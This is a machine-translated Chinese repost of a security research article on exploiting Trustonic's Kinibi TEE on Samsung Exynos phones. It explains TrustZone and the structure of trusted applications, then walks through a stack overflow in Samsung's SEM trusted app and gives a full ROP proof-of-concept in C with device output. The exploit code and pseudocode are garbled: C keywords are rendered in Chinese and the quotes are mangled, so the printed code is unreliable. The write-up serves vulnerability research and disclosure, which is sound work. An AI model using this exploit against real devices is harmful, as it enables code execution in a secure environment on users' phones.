【译】KINIBI TEE: TRUSTED APPLICATION EXPLOITATION

最新推荐文章于 2021-10-27 12:26:41 发布
最新推荐文章于 2021-10-27 12:26:41 发布
阅读量1.2k 收藏 2
点赞数
分类专栏: # Android Security TrustZone 系统安全与漏洞分析 文章标签: TEE Trustzone Kinibi
原文链接:https://www.synacktiv.com/posts/exploit/kinibi-tee-trusted-application-exploitation.html
版权

一段时间以来,Android设备和许多嵌入式系统都使用了受信任的执行环境(TEE)来托管一些安全功能(如硬件加密/密钥,DRM,移动支付,生物识别等)。 在ARM平台上,TEE是小型操作系统,它们使用ARM TrustZone技术将其执行与标准操作系统(例如Linux)隔离开。

TEE操作系统比Rich Execution Environment(智能手机中的REE,Android)简单得多,并且对逆向工程很有趣。 这篇博客文章专门介绍Trustonic的TEE实施,尤其是三星为其Exynos芯片组进行的集成。 三星最近在受信任的应用程序中修复了一个小漏洞。 在对TrustZone / Kinibi进行简要说明之后,本文详细介绍了此漏洞的利用。

信任区

在TrustZone体系结构中,TEE在安全的EL1异常级别上运行。 可将受信任的应用程序加载到其之上,并在安全的EL0异常级别上运行。 受信任的应用程序是经过签名的图像,只有在图像签名正确且来自受信任的开发人员的情况下,才能加载该图像。

REE通过执行安全监视器调用(在内核模式下使用特权SMC指令)与TEE通信。 这些调用由安全监视器处理,并中继到TEE内核。

 

TrustZone架构

TrustZone架构

TrustZone允许通过使用非安全标志(NS)标记内存来将安全世界的内存与正常世界隔离。 在正常情况下运行的代码只能访问标记为NS的内存。

在手机上,有3种主要的TEE实现:

  • 基于Qualcomm SoC的设备上的QSEE / QTEE
  • 华为的TrustedCore
  • 来自Trustonic的Kinibi

存在一个开源实现: op-tee ,此版本可以在Qemu和某些开发板上运行。

基尼比

Kinibi是Trustonic(也称为T-Base或Mobicore)构建的TEE实现,主要用于Mediatek和Exynos SoC。 Kinibi由多个组件组成:

  • 微内核:MTK
  • 运行时管理器:RTM
  • 很少的内置驱动程序:加密,安全存储,...
  • 应用程序/驱动程序使用的帮助程序库:McLib

Kinibi仅在Aarch32模式下运行。

基尼比建筑

基尼比建筑

微内核以安全的EL1异常级别运行。 它提供对驱动程序和受信任的应用程序的系统调用,并强制执行任务隔离。 安全监视器中的一段代码将SMC中断从正常环境中继到TEE内核,从而允许两个环境之间进行通信。 内核还执行抢占式调度。

运行时管理器是Kinibi的主要任务,它管理普通世界客户端和受信任的应用程序之间的会话。 当REE客户端打开新会话时,RTM首先检查应用程序是否已经加载。 加载过程涉及应用程序二进制文件的签名检查。 还可以对应用程序二进制文件进行加密,因此RTM在加载受信任的应用程序之前对其进行解密。

驱动程序在安全的EL0异常级别运行,并且由于其二进制文件与受信任的应用程序具有完全相同的格式,因此它们将加载相同的API。 与TA相比,驱动程序可以访问的系统调用更多。 这些额外的系统调用使驱动程序可以映射其他任务内存,物理内存,执行SMC调用等。

McLib库为TA和驱动程序提供了API。 它是二进制文件,映射到每个驱动程序或应用程序任务中的固定地址。 应用程序通过跳转到r0寄存器中具有API ID的库入口点来使用该库。 TA和驱动程序的功能称为tlApi*而仅驱动程序的功能称为drApi* 。 API函数的定义可以在许多GitHub存储库中找到,这有助于逆向工程。

在Samsung手机上,可以从sboot.bin轻松提取这些组件。 @kutyacica在ekoparty会议上提出了一种提取这些部分的好方法。 他在sboot.bin二进制文件中找到一个表,其中包含不同组件的偏移量。 自Galaxy S6以来,此表的格式略有变化,但解压缩二进制文件仍然很简单。

受信任的应用程序

在大多数情况下,受信任的应用程序和驱动程序是签名的二进制文件,但未加密,可以轻松进行分析。 在三星手机上,这些二进制文件存储在/vendor/app/mcRegistry//system/app/mcRegistry/目录中。

受信任的应用程序和驱动程序二进制文件使用的格式是MCLF格式。 该格式记录在trustonic-tee-user-space GitHub项目上可用的头文件中。 mclf-ida-loader可帮助您在IDA中加载此格式。

加载TA时,Kinibi使用MCLF头映射TA存储空间中的代码,数据和bss区域。 mcLib库映射到固定地址(Galaxy S8 / S9上为0x07d00000 )。 打开会话时,共享缓冲区(称为tci )也映射到固定地址: 0x001000000x00300000具体取决于MCLF标头中指定的版本。

REE中的TA客户端可以映射新的共享内存区域,这些区域映射为0x00200000 + map_id*0x00100000 。

 

TA内存映射

TA内存映射

大多数受信任的应用程序将tci共享内存用于输入和输出缓冲区,前32位用作命令ID。 通常,初始化是在入口点完成的(加密初始化,堆栈cookie随机化等),然后调用main函数。 main函数检查共享缓冲区的大小,然后启动主循环。 TA使用tlApiWaitNotification (6)API等待新消息,并处理共享缓冲区的内容。 响应数据被写入共享缓冲区,TA使用tlApiNotify (7)API通知REE,并等待新消息。

TA开发101

即使TEE操作系统专用于安全性操作,该操作系统也没有像ASLR / PIE这样的安全性强化,这使得利用受信任的应用程序中的漏洞非常容易。

G955FXXU2CREDG955FXXU3CRGH (对于Galaxy S8 +)之间的某个G955FXXU2CRED ,三星修补了SEM TA( fffffffff0000000000000000000001b.tlbin )。

该修补程序修复了0x1B命令处理程序中直接可达到的基于堆栈的缓冲区溢出。 此外,在此TA的新版本中启用了堆栈cookie。

  / * G955FXXU2CRED中的伪代码* /
 无效 __fastcall handle_cmd_id_0x1b ( unsigned int * tciBuffer)
 {
   // [...]
   字符 v64 [ 256 ];  // [sp + 158h] [bp-770h]
   字符 v65 [ 256 ];  // [sp + 258h] [bp-670h]
   字符 v66 [ 200 ];  // [sp + 358h] [bp-570h]
   字符 v67 [ 1024 ];  // [sp + 420h] [bp-4A8h]
   字符 v68 [ 64 ];  // [sp + 820h] [bp-A8h]
   字符 v69 [ 52 ];  // [sp + 860h] [bp-68h]
   int v70;  // [sp + 894h] [bp-34h]

   bzero( v66,0xC8u );
   bzero( v64,0x100u );
   bzero( v65,0x100u );
   bzero( v68,0x40u );
   v4 = tciBuffer [ 2 ];
   v5 = tciBuffer [ 3 ];
   //具有源和长度受控的memcpy
   memcpy(v66, tciBuffer + 4 , tciBuffer [ 3 ]);
   v6 = v5 + 12 ;
   v7 = * ( int * )(( char * )tciBuffer + v5 + 16 );
   如果 ( tciBuffer [ 23042 ] > ( unsigned int )(v7 + 208 ) )
   {
     snprintf(v67,0x400, “〜%18s:%4d:输入数据通过缓冲区。” , v8,113 );
     print( “ [E] SEM%s \ n ” , v67);
     回报 ;
   }
   // [...]

没有堆栈cookie,在命令处理程序中直接可以访问基于堆栈的缓冲区溢出,这应该使您想起您的第一个漏洞利用/挑战。

受信任的应用程序具有映射的执行代码页和读写数据页。 Kinibi没有像mprotect的syscall,也不提供syscall和Trusted Applications之间的map ,因此在TA中执行任意代码的唯一方法是对其代码进行ROP。

为了与TEE通信,使用了libMcClient.so库。 该库提供了加载TA,打开会话,映射内存并通知受信任的应用程序的功能。 Trustonic提供了使用此库的头文件: MobiCoreDriverApi.h 。 在Android上,只有某些特权应用程序和具有特定SElinux上下文的应用程序可以使用TEE驱动程序。

这是一个简单的漏洞利用,ROP在Samsung设备上打印受控日志字符串,TEE日志以kmsg打印。

  #include <stdio.h>
 #include <stdlib.h>
 #include <string.h>
 #include <sys / stat.h>

 #include “ MobiCoreDriverApi.h”

 #define err(f_,...){printf(“ [\ 033 [31; 1m!\ 033 [0m]”);  printf(f_,## __ VA_ARGS__);}
 #define ok(f_,...){printf(“ [\ 033 [32; 1m + \ 033 [0m]”);  printf(f_,## __ VA_ARGS__);}
 #define info(f_,...){printf(“ [\ 033 [34; 1m- \ 033 [0m]”);  printf(f_,## __ VA_ARGS__);}
 #define warn(f_,...){printf(“ [\ 033 [33; 1mw \ 033 [0m]”);  printf(f_,## __ VA_ARGS__);}

 int main ( int argc, char ** argv) {
     mcResult_t ret;
     mcSessionHandle_t session = { 0 };
     mcBulkMap_t 地图;
     uint32_t stack_size;
     char * to_map;


     // ROPgadget --binary fffffffff0000000000000000000001b.tlbin \
 // --rawArch arm --rawMode thumb --offset 0x1000
     uint32_t rop_chain [] = {
         0x38c2 +1 , // pop {r0,r1,r2,r3,r4,r5,r6,pc}
         0x0 , // r0(将是要打印的字符串)
         0x0 , // r1(参数,将在mcMap之后设置)
         0x0 , // r2(未使用)
         0x0 , // r3(未使用)
         0x0 , // r4(未使用)
         0x0 , // r5(未使用)
         0x0 , // r6(未使用)
         0x25070 + 1 // tlApiPrintf包装器
     };

     文件 * f = fopen(
         “ /data/local/tmp/fffffffff0000000000000000000001b.tlbin” ,
         “ rb”
     );
     如果 ( ! f) {
         err( “无法打开TA%s \ n ” ,argv [ 1 ]);
         返回 1 ;
     }
     fseek(f, 0 , SEEK_END);
     uint32_t ta_size = ftell(f);
     fseek(f, 0 , SEEK_SET);


     char * ta_mem = malloc(ta_size);
     if (fread(ta_mem, ta_size, 1 , f) != 1 ) {
         err( “无法读取TA” );
         返回 1 ;
     }

     uint32_t tciLen = 0x20000 ;  // TA访问此WSM上的固定偏移量
                                //因此缓冲区应该足够大
     uint32_t * tci = malloc(tciLen);

     ret = mcOpenDevice(MC_DEVICE_ID_DEFAULT);
     如果 (ret != MC_DRV_OK) {
         err( “无法mcOpenDevice \ n ” );
         返回 1 ;
     }

     to_map = strdup( “->来自受信任应用程序的Hello <- \ n ” );

     ret = mcOpenTrustlet( & session, 0 , ta_mem, ta_size, 
                          ( uint8_t * ) tci , tciLen);
     如果 (ret == MC_DRV_OK) {
         //将字符串映射到TA虚拟空间中,API返回
         // TA空间中的地址。
         ret = mcMap( & session, to_map, 40960 , (mcBulkMap_t * ) & map);
         如果 (ret != MC_DRV_OK) {
             err( “无法映射到 \ n ” );
             返回 1 ;
         }
         ok( “ TA虚拟内存中的地址:0x%x \ n ” , map.sVirtualAddr);

         // rop_chain [1]为R0,将其指向TA中的字符串
         //地址空间。
         rop_chain [ 1 ] = map.sVirtualAddr;

         stack_size = 0x54c ;  //填充堆栈框架
         stack_size + = 0x20 ;  //弹出的寄存器大小

         //填充tciBuffer
         tci [ 0 ] = 27 ;  // cmd ID
         tci [ 3 ] = stack_size + sizeof (rop_chain);  // memcpy大小
         memcpy( & tci [ 4 + stack_size / 4 ], & rop_chain, sizeof (rop_chain));

         //通知助教
         mcNotify( & session);
         mcWaitNotification( & session, 2000 );
         mcCloseSession( & session);
     }
     mcCloseDevice(MC_DEVICE_ID_DEFAULT);
     返回 0 ;
 }

  dreamlte:/#/数据/本地/ tmp / exploit_sem
 [+] TA虚拟内存中的地址:0x2005f0

 dreamlte:/#dmesg -c |  grep TEE
 TEE:b01 | [I] SEM [INFO]:开始SEM TA ::版本:2016.06.15.1
 TEE:b01 | [E] SEM错误的CCM版本
 TEE:b01 | [E] SEM错误的CCM版本
 TEE:b01 | [E] SEM handleCCMDataSWP [错误END]
 TEE:b01 |->从受信任的应用程序<-您好

结论

本文显示了在Trusted App中实现任意代码执行有多么容易。 SEM应用程序还包含其他重要漏洞,但是堆栈cookie限制了漏洞利用。

由于TEE提供了一种防回滚机制,因此在最新设备上,TA中的修补漏洞应该是无法利用的。 不幸的是,三星在合并与安全相关的补丁时并不总是增加版本号。 SEM TA就是这种情况,这意味着仍可以加载和利用旧版本。
在许多三星设备上,防回滚机制似乎根本不起作用(例如在S8上)。

由于攻击者可以与安全驱动程序和TEE内核syscall进行交互,因此在受信任的应用程序中获得代码执行会大大增加攻击面。

Omni-Space
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Trusted Applications介绍
baron-周贺贺-代码改变世界ctw
09-25 1778
由于 optee_os不与 libutee链接,PTA只能使用optee_os内部的API。user mode TA 是GlobalPlatform API TEE 规范指定的全功能可信应用程序,这就是所谓的“可信应用程序”,并且在大多数情况下,这是编写和使用首选的就是这种user mode TA。PTA 是一个接口,一个OP-TEE 核心export到外部的接口,即暴漏给TA或CA的接口。PTA无法使用GP API,PTA只能使用optee_os内的API。CA或TA都可以直接调用PTA。
<OPTEE>Trusted Application结构分析
weixin_30539835的博客
04-15 300
  最近又开始和Trusted Zone打起了交道,需要把Linaro开发的开源安全系统optee os移植到实验室的老板子上。不过导师要求我先开发一个应用,在普通环境和安全环境分别有一个程序,称为host与trusted application(简称TA)。让我在这个过程中了解一下这个系统。   optee os的github地址:https://github.com/OP-TEE/optee...
稳扎稳打Silverlight(45) - 4.0浏览器外运行(Out Of Browser)之被信任的应用程序(Trusted Application)
webabcd的专栏
08-19 703
[源码下载]<br /><br /><br />稳扎稳打Silverlight(45) - 4.0浏览器外运行(Out Of Browser)之被信任的应用程序(Trusted Application)<br /><br />作者:webabcd<br /><br /><br />介绍<br />Silverlight 4.0 OOB 之 被信任的应用程序:<br />概述 访问本地文件系统调用 COM 接口自定义窗口样式和行为 <br /><br />在线DEMO<br />http://www.cnbl
Trustonic:移动应用将获益于ARM的硬件级安全特性
幻雪神界
12-20 639
早在今年4月,ARM、Giesecke&Devrient和Gemalto就已联手,并给了各自9个月的时间,为它们新合并的移动安全平台找到最完美的品牌名称。今天,我们看到了它们的努力成果:Trustonic。Trustonic与三星Galaxy S3上的Mobicore、以及Tegra平板电脑上的Trusted Foundation一样:它允许软件的某些部分访问硬件级的加密和身份验证,从而消除了很多
基于trustonic tee使能MTK Widevine L1(SVP)
努力创作有价值的文章
10-27 5288
本文记录MTK芯片在Android S(Android 12)大版本上基于trustonic tee方案来开启Widevine L1方案整个移植过程。 MTK平台支持Widevine L1情况 G系列中高端平台,G70/G80/G85/G88对应mt6769平台,G90/G95对应mt6785平台,G96对应mt6781平台 软件宏设置情况 "preloader":[ ["MTK_TEE_SUPPORT", "yes"], ["MICROTRUST_TEE_SUPPORT", "no"].
arm-trusted-firmware:Trusted Firmware-A的只读镜像
04-29
可信固件-A Trusted Firmware-A(TF-A)是用于(Armv8-A和Armv7-A)的安全世界软件的参考实现,其中包括Exception Level 3(EL3) 。 它为在AArch32或AArch64执行状态下的安全世界启动和运行时固件产品化提供了一个...
IEEE Finance Playbook Version 1.0:Trusted Data and Artificial In
09-30
IEEE Finance Playbook Version 1.0:Trusted Data and Artificial Intelligence Systems (AIS) for Financial Services - 完整英文电子版(97页).zip
plugin-aws-trusted-advisor:AWS Trusted Advisor Collector
03-03
插件-aws-trustadvisor 适用于AWS Trust Advisor的插件发行公告版本1.0.1 支持data.account_id版本1.0.2 更改flagged_resource。 在受影响的资源中添加表数据版本1.0.3 添加描述标签支持HTML文字
TEE and its Key Management:
最新发布
03-11
TEETrusted Execution Environment,可信执行环境)是一种安全环境,旨在提供隔离和保护,使应用程序和安全关键操作能够在不被其他应用程序或操作系统干扰的情况下执行。它常用于存储和处理敏感数据,例如密码、...
TEE 内部核心 API 规范 v1.3
10-18
**TEE (Trusted Execution Environment) 内部核心API规范 v1.3** TEE是一种安全环境,它在设备的主操作系统(通常为Android或iOS)之外提供了一个隔离的区域,用于执行安全敏感的操作和保护关键数据。TEE内部核心...
trustonic-tee-driver:可信执行环境的Android驱动程序
05-06
Trustonic T恤司机 Trustonic可信执行环境的Android驱动程序 QEmu / Goldfish模拟器的版本 要构建内核模块: 将trustonic文件夹复制到Linux内核树的'drivers'目录中 相应地更新全局Kconfig和Makefile 构建模块
TEE - CA, TA
迟来大师的博客
12-10 3740
TA 是 Trusted Application 的缩写,通常运行在 TEE 环境下的应用简称为 TA。 CA 是 Client Application 的缩写,通常运行在 REE 环境下的应用简称为 CA。 TEE(Trusted Execution Environment) 通常用来进行数字版权管理(DRM : Digital Rights Management )、移动支付和敏感数据保护。 TEE 的实现是基于 ARM TrustZone。 CA通过SMC中断进入TEE。 通常一个流程为...
汽车网络安全风口渐起,诚迈科技与Trustonic牵手“发力”
高工智能汽车
08-19 210
当前,车联网正在迅速融入人们的日常生活,但同时网络安全也开始成为了汽车产业发展的巨大隐患。 有业内人士表示,一辆智能网联汽车每天至少会产生10TB的数据,这些数据涉及到驾乘人员的出行轨迹、习惯等,一旦遭受侵害不仅会泄露个人隐私,还有可能导致车内敏感信息被篡改,从而危害到驾乘人员的生命安全,严重的还会威胁到国家安全。 2021年8月16日,诚迈科技宣布与网络安全技术领导者Trustonic建立合作关系,双方将结合自身专业技术进行优势互补与深度融合,共同保障车联网安全。 据了解,Trustonic旗下的T
ARM TrustZone技术简介 -- 4 (TrustOS)
Alex___Zhao的博客
08-26 4744
TrustZone技术在物理上可以把一个ARM处理器核分时复用为两个不同的处理器,在处理器的非安全部分运行的是标准的Linux系统,而在另外一侧运行的是安全强相关的功能。而由于ARM  TrustZone的硬件隔离作用,其相互之间的交互只能通过机器指令SMC来使能切换,而实际的切换过程由ARM提供的TrustFirmware BL31 来提供 。 在硬件外部设备划分的过程中,一般情况下IRQ交由
可信执行环境(TEE)介绍
热门推荐
braveheart95的专栏
05-03 2万+
可信执行环境(TEE)是Global Platform(GP)提出的概念。针对移动设备的开放环境,安全问题也越来越受到关注,不仅仅是终端用户,还包括服务提供者,移动运营商,以及芯片厂商。TEE是与设备上的Rich OS(通常是Android等)并存的运行环境,并且给Rich OS提供安全服务。它具有其自身的执行空间,比Rich OS的安全级别更高,但是比起安全元素(SE,通常是智能卡)的安全性
tee
diexian5592的博客
09-07 52
从标准输入接受数据,并且写到文件中 通常搭配管道使用 转载于:https://www.cnblogs.com/0916m/p/11481700.html
青莲云推出嵌入式TEE安全解决方案亮相2019北京网络安全大会
青莲云
08-23 212
2019北京网络安全大会(简称BCS 2019)8月21日在北京国家会议中心开幕,20位两院院士,与来自30多个国家、70多所全球知名院校、机构和企业的 400多位国内外安全领袖齐聚,聚焦全球网络风险应对策略,探讨网络安全前沿技术,呼吁构建网络内生安全体系,实现组织安全能力的“自生长”。 本次大会主题为“聚合应变,内生安全”。大会组委会介绍,随着5G时代到来,无人驾驶、智慧城市、智能工厂全面...
物联网终端应用TEE的一些思考
zklzklzklzkl的博客
01-10 663
一、引言 近年来,可信执行的概念在物联网安全领域也逐渐流传。可信执行环境(TEETrusted Execution Environment)在智能手机中的应用非常广泛,如OP-TEE[1]、Trusty TEE等开源TEE。几乎所有新上市的安卓手机都有TEE。那问题来了,TEE解决了什么问题?集成在物联网终端中否有必要?如果有,哪些能力能帮助终端或者物联网提升安全等级? 这些都是笔者初次听...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值